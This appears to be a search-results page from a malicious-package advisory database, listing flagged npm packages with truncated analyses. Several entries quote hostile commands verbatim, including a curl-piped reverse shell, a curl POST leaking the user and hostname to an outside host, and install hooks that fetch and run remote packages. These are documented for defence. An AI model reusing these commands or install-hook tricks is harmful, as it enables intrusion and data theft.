234544 matches found
Malicious Package
Overview ganache-cli-provider is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...
Malicious Package
Overview foundy-toolkit is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...
MAL-2026-4232 Malicious code in build-integrity-verify (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2a4941223186440162de6c5ce0a5a5797589d69e6957473761b04818b8b9b5e7 The package contains no functionality of its own. Its postinstall lifecycle hook runs npx env-security-scanner@latest auditenvironment via...
Malicious code in dependency-audit-tool (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 07144a70b38d5ada8c75d4cb8027f378cca7c094f823a544d056b07cb999e663 package.json declares a postinstall hook that runs node -e "tryrequire'childprocess'.execSync'npx env-security-scanner@latest...
Malicious code in python-env-auditor (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 32ffd6ffbc7ab684cc6bd3dbbd29d4bb608f07ea2b9d2ffd460e95a279824699 Package fetches and executes a mutable, unpinned third-party npm package env-security-scanner@latest on every install and on every Python import. The...
Malicious code in internallib_v493 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7 The package's sole exported function command in index.js executes /bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh", fetching a...
MAL-2026-4585 Malicious code in internallib_v493 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7 The package's sole exported function command in index.js executes /bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh", fetching a...
MAL-2026-4582 Malicious code in ignite-market-contracts (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3632f7802511e2852d33925ab4d8612fe588de1f8a1d832011cd3588d23f62bc The package's preinstall lifecycle hook in package.json runs wget --quiet...
NPM: JavaScript Cookie: Per-instance prototype hijack in assign() enables cookie-attribute injection
NPM: JavaScript Cookie: Per-instance prototype hijack in assign enables cookie-attribute injection vulnerability discovered by ? in WordPress Npm js-cookie versions = 3.0.5...
Malicious code in @rui.branco/sentry-mcp (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8504c65903895f53054fc6df861469ddbac73c130793bd784d47eca8ef2cd65b On every load of index.js the package's main and bin entry, the package queries GitHub for the latest commit SHA on HEAD of rui-branco/sentry-mcp and...
MAL-2026-4424 Malicious code in @remitee-money-transfer/rmt-base (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5f21c6601855c2f2d0a5d0761d3defe8c0ba1708dd2a67fb278c03e0abd6ba16 Package ships only a preinstall lifecycle script scripts/preinstall.sh and no functional code. On npm install, the script reads /etc/passwd and...
NPM: NocoDB: Attachment Size Limit Bypass via Upload-by-URL
NPM: NocoDB: Attachment Size Limit Bypass via Upload-by-URL vulnerability discovered by ? in WordPress Npm nocodb versions = 0.301.3...
Malicious code in @jaggle/resizeobserves (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3fe4b050d79ecfc702c9222cf3347e49d4530efd23a2120ee040ef32e0a76e4f Package name impersonates the popular @juggle/resize-observer j→j substitution and pluralized 'resizeobserves' and the README is copied verbatim from...
Malicious code in @kyungseopk1m/holidays-kr (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f8538f74ec98ab5287a941ebac99e8624ba40d809edbc5b033da1150254d8215 On import/use, dist/cjs/index.js and dist/mjs/index.js call fetch against the hardcoded endpoint https://kdata.kxxseop.workers.dev with data sourced...
Malicious code in chai-as-tuned (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f7e00f81e117716cfd7fd3565cf8b04073cd494a6da2c23749669133806a7473 Package name chai-as-tuned impersonates chai-as-promised and ships a README copy-pasted from the unrelated pino project npm/CI badges point at...
Malicious code in veteran (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 70a20dd9f8d6a9df01d766c25693711d90e4303e3c68fa371f0b842f83c485b4 On npm install, the package's postinstall hook install.js, registered via package.json line 10 "postinstall": "node install.js" downloads a...
Malicious code in celonix-otp-react (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector df58532b5edb3f7a5ad9734a7f4fa46f062c0f220d578db42a223188d078d9bb The package presents itself as a React OTP component, but its only exported widget hardcodes a single Firebase Realtime Database URL...
Malicious code in @vino.tian/vibe-kanban (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7f1533bb7e55b1bcd10291aa9f19e2a5cbe5755a7a6a7343d38fbd3ff8064a1f This package is published as @vino.tian/vibe-kanban and copies its README, name, and feature description from BloopAI's legitimate vibe-kanban projec...
MAL-2026-4229 Malicious code in @luke-101141/nobody (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8a22de475581dbf26085c2605781782a61205eb62add0a261eabe2357ac2cbc8 On require, index.js executes curl -X POST "http://frgthyujiouyh.requestcatcher.com/noderedactedsdk/$whoami/$hostname/", leaking the installing user'...
Malicious Package
Overview chai-as-afforded is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...